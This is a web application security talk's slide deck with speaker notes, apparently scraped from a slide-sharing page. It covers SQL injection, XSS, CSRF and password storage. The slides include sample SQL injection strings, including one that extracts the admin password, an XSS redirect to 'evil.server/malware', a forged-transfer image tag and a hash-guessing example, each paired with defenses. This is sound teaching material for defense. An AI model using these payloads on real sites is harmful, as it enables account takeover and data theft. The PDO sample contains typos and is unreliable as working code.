The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 

Recently uploaded (20)

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 

SECURING WEB APPS

  • 1. Web Application Security by Lee Christensen @tifkin_
  • 2. Thanks to our Sponsors!
  • 3. Who is this guy? • Lee Christensen • Penetration Tester and Security Consultant • Computer Security Enthusiast • Web Application Security • Browser Security • Developer (at heart…) • Almost a Weber State graduate
  • 5. Where are we going? • Attacker techniques and defenses (Application level) • Awareness – NON-COMPREHENSIVE • Injection Attacks • SQL injection • Cross-site scripting • Cross Site Request Forgery • Password Storage • Quick note on permission
  • 7. DEMO SQL injection attacks and techniques
  • 8. Input: PASSWORD SELECT user_id FROM phorum_users WHERE username = 'admin' AND password = 'PASSWORD'
  • 9. Input:’ OR 1=1# SELECT user_id FROM phorum_users WHERE username = 'admin' AND password = '_________'
  • 10. Input:’ OR 1=1# SELECT user_id FROM phorum_users WHERE username = 'admin' AND password = '' OR 1=1#'
  • 11. BLAH' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT( '>>>', (SELECT password FROM phorum_users WHERE username = 'admin') ,'<<<', FLOOR(RAND(0)*2))x FROM phorum_users GROUP BY x)a)#'
  • 12. Defenses • “Give me parameterized SQL, or give me death” – Jeff Atwood • No concatenating strings! • Server-side input validation • Whitelist Acceptable Characters • Avoid blacklists where possible • Use an Object Relational Mapper (ORM) • NO CONCATENATING STRINGS!
  • 13. $db = new PDO('mysql:host=host;dbname=<DB>', 'DB_USER', 'DB_PASSWORD'); $db = $db->prepare('SELECT user_id FROM phorum_users HERE username = :username AND password = :password'); $db->bindParam(':username', $username, PDO:PARAM_STR); $db->bindParam(':password', $password, PDO:PARAM_STR); $db->execute();
  • 15. What is XSS? • Injected client side content (usually JavaScript*) • Extremely Prevalent • Some of the types • Reflective • Persistent (Stored) • DOM-based • Mutation XSS (mXSS) • Flash-based XSS
  • 16. Reflective XSS • welcome.jsp?name=Bob • Welcome Bob! • welcome.jsp?name=<blink>Bob</blink> • Welcome <blink>Bob</blink> R.I.P. <blink> - Aug. 6, 2013 • welcome.jsp?name=<script>document.location=“evil.server/malware ”</script> • Welcome <script>document.location=“evil.server/malware”</script>! Vulnerable Code Welcome $name
  • 17. Persistent XSS • XSS attack payload is stored • Database • Session variable • Cookie • File • Image metadata
  • 19. How XSS exploits clients • Session hijacking • (HttpOnly flag on cookies) • Malware • Stealing Credentials • Internal network scanning • Data Theft • Impersonating Users • Bypass CSRF Defenses • Key loggers
  • 20. XSS Defenses • Contextual Output Encoding
  • 21. Vulnerable Code Resulting Output <div> INPUT </div> <div> <script>alert(1)</script> </div> <input value=“INPUT”> <input value=“” onfocus=“alert(1)”> <script> var a = “INPUT”; </script> <script> var a = ““ + alert(1) + “”; </script> Contextual Output Encoding Examples
  • 22. Vulnerable Code Resulting Output <div> encodeForHtml(INPUT) </div> <div> &lt;script&gt;alert(1)&lt;/script&gt; </div> <input value=“encodeForHtmlAttr(INPUT)”> <input value=“&quot;&#x20;onfocus&#x3D;&quot;alert(1)”> <script> var a = “encodeForJS(INPUT)”; </script> <script> var a = “x22x20x2bx20alertx281x29x20x2bx20x22”; </script> Contextual Output Encoding Examples https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  • 23. XSS Defenses • Contextual Output Encoding • OWASP Java Encoder Project • ESAPI (PHP, Coldfusion, Python) • Anti-XSS (.NET) • Server side input validation • Use a whitelist where possible • HTML Sanitizers • AntiXSS/HTML Agility Pack (.NET) • Java HTML Purifier • HTML Purifier/htmLawed (PHP) • DOM Purify (JavaScript, NodeJS?)
  • 24. XSS Defenses – continued • Understand your framework’s defenses • @Model.name • <a href=“javascript&#x3A;alert(1)”>Click Me!</a> • Use a JavaScript MVC framework that supports templated views • <div>{{user.name}}</div> • https://code.google.com/p/mustache-security/ • Content Security Policy
  • 25. Cross Site Request Forgery (CSRF)
  • 26. What is CSRF? • “Forced Browsing” • my.bank/transfer?amount=1000&to=1234 • <img src=“my.bank/transfer?amount=1000&to=666”> • 4.5 million Routers Hacked via CSRF • Places to be especially aware of • Actions • Account/Role Management
  • 28. CSRF Defense • Eliminate Cross Site Scripting(XSS) • Re-enter password • GET requests do NOT change server state • Synchronizer-token pattern 1. Random token is generated associated with user’s session 2. Include token in each state-changing request made to the server 3. Server validates that token submitted is valid
  • 29. CSRF defenses in action • CSRF Token • Unique per user session • Sent on state-changing requests if(tokenInRequest == TokenOnServer) Proceed else Error!
  • 30. Example: ASP.NET MVC Controller [ValidateAntiForgeryToken] public ActionResult DoSomething() { // Do stuff } View <div> @using (Html.BeginForm()) { @Html.AntiForgeryToken() //Other form elements } </div>
  • 32. Hashing • Potatoes + Frying Pan = Protection!
  • 33. Hashing • Potatoes + Frying Pan = Protection! • One-way function • sha1(password) = 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 • sha1(salt + password) • sha1(“A3dyUc” + “password”) = e9d435577a819b718fea098a7f4b4b6c9e1963da • sha1(“8DcPvd” + “password”) = aa5f9e6c1f87b3520b08fb1540c3fa62cf2afb03 • Password + Salt = Sufficient?
  • 34. Password Cracking Leaked Hash: 25ab86bed149ca6ca9c1c0d5db7c9a91388ddeab Guesses: • sha1(password) => 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 • sha1(123456) => 7c4a8d09ca3762af61e59520943dc26494f8941b • sha1(admin) => d033e22ae348aeb5660fc2140aec35850c4da997 • sha1(monkey) => ab87d24bdc7452e55738deb5f868e1f16dea5ace • sha1(s3cr3t) => 25ab86bed149ca6ca9c1c0d5db7c9a91388ddeab
  • 35.
  • 37. 1) Do not limit the type of characters or length of user password • Limiting passwords to protect against injection is doomed to failure • Be wary of systems that allow unlimited password sizes (Django DOS Sept 2003) • One Exception: Password1! Password Storage in the Real World
  • 38. 2) Use a cryptographically strong credential-specific salt •protect( [salt] + [password] ); •Use a 32char or 64char salt (actual size dependent on protection function); •Do not depend on hiding, splitting, or otherwise obscuring the salt Password Storage in the Real World
  • 39. Leverage Keyed Functions 3a) Impose difficult verification on [only] the attacker (strong/fast) •HMAC-SHA-256( [private key], [salt] + [password] ) •Protect this key as any private key using best practices •Store the key outside the credential store •Build the password-to-hash conversion as a separate web service (cryptographic isolation).
  • 40. 3b) Impose difficult verification on the attacker and defender (weak/slow) •PBKDF2([salt] + [password], c=10,000,000); •Use PBKDF2 when FIPS certification or enterprise support on many platforms is required •Use Scrypt where resisting any/all hardware accelerated attacks is necessary but enterprise support and scale is not. Password Storage in the Real World
  • 41. Closing Thoughts • Code with an attacker’s perspective • Test your app • Continue to learn • Get Involved • OWASP (Open Web Application Security Project) • http://utahsec.org

Editor's Notes

  1. Developers? QA? Languages: .NET? Java? PHP? Ruby?
  2. Understand the attacker’s perspective when look at apps NON-COMPREHENSIVE Attacker techniques and defenses - How attacker’s exploit vulnerabilities - How to defend Going over vulnerabilities Why are we just doing these? Most common Offensive spin to everything – my specialty
  3. Image: http://www.flickr.com/photos/8499561@N02/2755504975/in/photolist-5cuFCt-5cyTFq-5cyVwQ-5PGgWn-5PLzkq-5ZbRfL-63ciQ6-63gz1o-6cJBtc-6cJBVv-6cJCza-6cNK9s-6cNKt7-6cNKzy-6cNKKb-6cNL4h-6dm6RV-6dm7t6-6dm872-6dm98k-6dm9Ex-6dqg2s-6dqhB5-6dCQbG-6e4Mpw-6EZAr6-6GJdwM-6ZqChc-7biTyy-7hbyKu-8mkoo3-8mhcLV-8mh8Mi-8mhe6F-8mkknh-8mhcv6-dxPs8E-8mhi7P-8mkjmb-8mkiqy-8mhfzx-9hXF8W-aMjLPH-9naPe7-cAZHzf-8mhhNn-8mhggX-7Akczu-hxpV6c-91DUz4-gTv7hS
  4. The explanation behind why this specific vector works can be found here: http://bugs.mysql.com/bug.php?id=8652 Each language has multiple queries that that can produce the same type of error
  5. Parameterized queries: - Encode dangerous characters - Bind data type - Performance Whitelist: Soda machine – only allows certain currencies (25 cent, $1, $5) - Regex (There’s Unicode regex if you need international) Blacklist: Swear words on TV (You can’t say these X number of swear words…)
  6. Why does this produce an error? See http://bugs.mysql.com/bug.php?id=8652 Each language has multiple queries that that can produce the same type of error
  7. - You can attack clients without using JavaScript. This is especially useful if content security policy is being employed by the site. More info: http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf http://channel9.msdn.com/Events/Blue-Hat-Security-Briefings/BlueHat-Security-Briefings-Fall-2012-Sessions/BH1203 mXSS https://cure53.de/fp170.pdf http://www.slideshare.net/x00mario/the-innerhtml-apocalypse
  8. XSS is a misnomer Likely attack vector – clicking on a link (email, twitter, etc)
  9. XSS payload is stored somewhere (it persists in that location)
  10. Session Hijacking: UbuntuForums (http://blog.canonical.com/2013/07/30/ubuntu-forums-are-back-up-and-a-post-mortem/) Use the HttpOnly flag Network scanning: http://www.symantec.com/connect/blogs/getting-sassy-xss-part-3-port-scanning
  11. Assuming no browser bugs
  12. Angular, KnockoutJS, Ember ASP.NET Request Validation Engine – doesn’t protect against everything
  13. Browser makes a request that the user never intended to make Violates user’s trust in browser - Users trust that their browser won’t Millions of Routers Hacked https://www.securelist.com/en/blog/208193852/The_tale_of_one_thousand_and_one_DSL_modems
  14. NOT changing state on GET requests
  15. CSRF token will change after I log Not shown – I also had to enter my password to change my account information When server receives request, the server ensures the CSRF token matches sent in the request matches the CSRF stored in the user’s session variable
  16. Image: http://www.flickr.com/photos/15927968@N00/8516930548/in/photolist-dYBuJ9-dYvMdH-dYQqVJ-dYQr5s-dYQr97-dYJJtt-dYJJBB-dYQr2o-dYJJ36-dYJJHP-dYvMx2-f7kFK6-fSv6bM-8kMyaw-9Jato9-dAPegg
  17. Image: http://www.flickr.com/photos/19359283@N00/7159593410/in/photolist-bUEMFG-aQGurF-bxSyvP-butMo6-9xujR1-cCv6tj-e4RzEp-byNR9F-bnGkBU-cLB6XW-cRNmTA-boCoax-bme2dx-adL7NK-e4nMCh-e4haGx-gvqpN2-7P4hPV-81r41Z-9LR17J-aieZG1-7K5qkP-dEmk4B-cNdW4Y-dEXPaL-dHAbwF-c8Ng7Y-bz2pyF-dHC88t-dHHxbd-dHC7Li-dHHxx5-cyaxp1-9zjynW-8FzinT-amnSL1-9AVHkB-dRn1Dm-dRbeFG-bC17so-88LVQA-bxunYd-97spQP-dKgkdu-j7ZGxc-d6s1xJ-e9PXZX-d6rRkd-d6rTks-d6rSgJ-d6rUwd
  18. Salt is stored right along side with the password (not secret) Image: http://www.flickr.com/photos/19359283@N00/7159593410/in/photolist-bUEMFG-aQGurF-bxSyvP-butMo6-9xujR1-cCv6tj-e4RzEp-byNR9F-bnGkBU-cLB6XW-cRNmTA-boCoax-bme2dx-adL7NK-e4nMCh-e4haGx-gvqpN2-7P4hPV-81r41Z-9LR17J-aieZG1-7K5qkP-dEmk4B-cNdW4Y-dEXPaL-dHAbwF-c8Ng7Y-bz2pyF-dHC88t-dHHxbd-dHC7Li-dHHxx5-cyaxp1-9zjynW-8FzinT-amnSL1-9AVHkB-dRn1Dm-dRbeFG-bC17so-88LVQA-bxunYd-97spQP-dKgkdu-j7ZGxc-d6s1xJ-e9PXZX-d6rRkd-d6rTks-d6rSgJ-d6rUwd
  19. Can’t reverse hashes, so let’s just guess some
  20. Image and more info: https://hashcat.net/forum/thread-2798.html
  21. Guidance   Do not defeat users’ attempts to secure their credentialslimit type of characters or length of user passwords Some organizations restrict the 1) types of special characters and 2) length of credentials accepted by systems because of their inability to prevent SQL Injection, Cross-site scripting, and analogous command-injection attacks. However, secure password storage mechanisms possess design elements that prevent length, constituency, and even encoding from subverting system security. Do not apply length, character set, or encoding restrictions on the entry or storage of credentials. Continue applying encoding, escaping, masking, outright omission, and other best practices to rendering this information when applicable.    - Slide barrowed graciously from Jim Manico
  22. Salts serve two purposes: De-duplicate protected output of identical credentials and Augment entropy fed to protecting function without relying on credential complexity. The second aims to make pre-computed lookup attacks [*2] on an individual credential and time-based attacks on a population intractable. - Slide barrowed graciously from Jim Manico
  23. Use an HSM (Hardware Security Module). Private key not accessible by running software (There’s a hardware separation) Do NOT just use a symmetric cipher like AES!! HMACs inherit properties of hash functions including their speed, allowing for near instant verification. Key size imposes intractable size- and/or space- requirements on compromise--even for common credentials (aka password = ‘password’). Designers protecting stored credentials with keyed functions:   Use a single “site-wide” key;   Protect this key as any private key using best practices; Store the key outside the credential store (aka: not in the database); Generate the key using cryptographically-strong pseudo-random data; Do not worry about output block size (i.e. SHA-256 vs. SHA-512). Example protect() pseudo-code follows: return [salt] + HMAC-SHA-256([key], [salt] + [credential]);   Upholding security improvement over (solely) salted schemes relies on proper key management.   Design protection/verification for compromise The frequency and ease with which threats steal protected credentials demands “design for failure”. having detected theft, a credential storage scheme must support continued operation by marking credential data compromised and engaging alternative credential validation workflows as follows:   Protect the user’s account Invalidate authN ‘shortcuts’ disallowing login without 2nd factors or secret questions Disallow changes to account (secret questions, out of band exchange channel setup/selection, etc.) Load & use new protection scheme Load a new (stronger) protect(credential) function Include version information stored with form Set ‘tainted’/‘compromised’ bit until user resets credentials Rotate any keys and/or adjust protection function parameters (iter count) Increment scheme version number When user logs in: Validate credentials based on stored version (old or new); if old demand 2nd factor or secret answers Prompt user for credential change, apologize, & conduct OOB confirmation Convert stored credentials to new scheme as user successfully log in   Supporting workflow outlined above requires tight integration with Authentication frameworks and workflows. http://www.tarsnap.com/scrypt/scrypt.pdf   Slide barrowed graciously from Jim Manico
  24. Impose intractable verification on [only] attacker The function used to protect stored credentials should balance between A) acceptable response time for verification of users’ credentials during peak use while B) placing time required to map <credential> → <protected form>  beyond threats’ hardware (GPU, FPGA) and technique (dictionary-based, brute force, etc) capabilities. Two approaches facilitate this, each imperfectly. Leverage an adaptive one-way function - Adaptive one-way functions compute a one-way (irreversible) transform. Each function allows configuration of ‘work factor’. Underlying mechanisms used to achieve irreversibility and govern work factors (such as time, space, and parallelism) vary between functions and remain unimportant to this discussion. Select:   PBKDF2 [*4] when FIPS certification or enterprise support on many platforms is required; Scrypt [*5] where resisting any/all hardware accelerated attacks is necessary but support isn’t. Example protect() pseudo-code follows: return [salt] + pbkdf2([salt], [credential], c=10000);   Designers select one-way adaptive functions to implement protect() because these functions can be configured to cost (linearly or exponentially) more than a hash function to execute. Defenders adjust work factor to keep pace with threats’ increasing hardware capabilities. Those implementing adaptive one-way functions must tune work factors so as to impede attackers while providing acceptable user experience and scale. Additionally, adaptive one-way functions do not effectively prevent reversal of common dictionary-based credentials (users with password ‘password’) regardless of user population size or salt usage.   Leverage Keyed functions - Keyed functions, such as HMACs, compute a one-way (irreversible) transform using a private key and given input. For example, HMACs inherit properties of hash functions including their speed, allowing for near instant verification. Key size imposes intractable size- and/or space- requirements on compromise--even for common credentials (aka password = ‘password’). Designers protecting stored credentials with keyed functions:   Use a single “site-wide” key;   Protect this key as any private key using best practices; Store the key outside the credential store (aka: not in the database); Generate the key using cryptographically-strong pseudo-random data; Do not worry about output block size (i.e. SHA-256 vs. SHA-512). Example protect() pseudo-code follows: return [salt] + HMAC-SHA-256([key], [salt] + [credential]);   Upholding security improvement over (solely) salted schemes relies on proper key management.   Design protection/verification for compromise The frequency and ease with which threats steal protected credentials demands “design for failure”. having detected theft, a credential storage scheme must support continued operation by marking credential data compromised and engaging alternative credential validation workflows as follows:   Protect the user’s account Invalidate authN ‘shortcuts’ disallowing login without 2nd factors or secret questions Disallow changes to account (secret questions, out of band exchange channel setup/selection, etc.) Load & use new protection scheme Load a new (stronger) protect(credential) function Include version information stored with form Set ‘tainted’/‘compromised’ bit until user resets credentials Rotate any keys and/or adjust protection function parameters (iter count) Increment scheme version number When user logs in: Validate credentials based on stored version (old or new); if old demand 2nd factor or secret answers Prompt user for credential change, apologize, & conduct OOB confirmation Convert stored credentials to new scheme as user successfully log in   Supporting workflow outlined above requires tight integration with Authentication frameworks and workflows. http://www.tarsnap.com/scrypt/scrypt.pdf  
  25. Test your app - Test it yourself, hire someone, try some tools I only grazed the world of web application security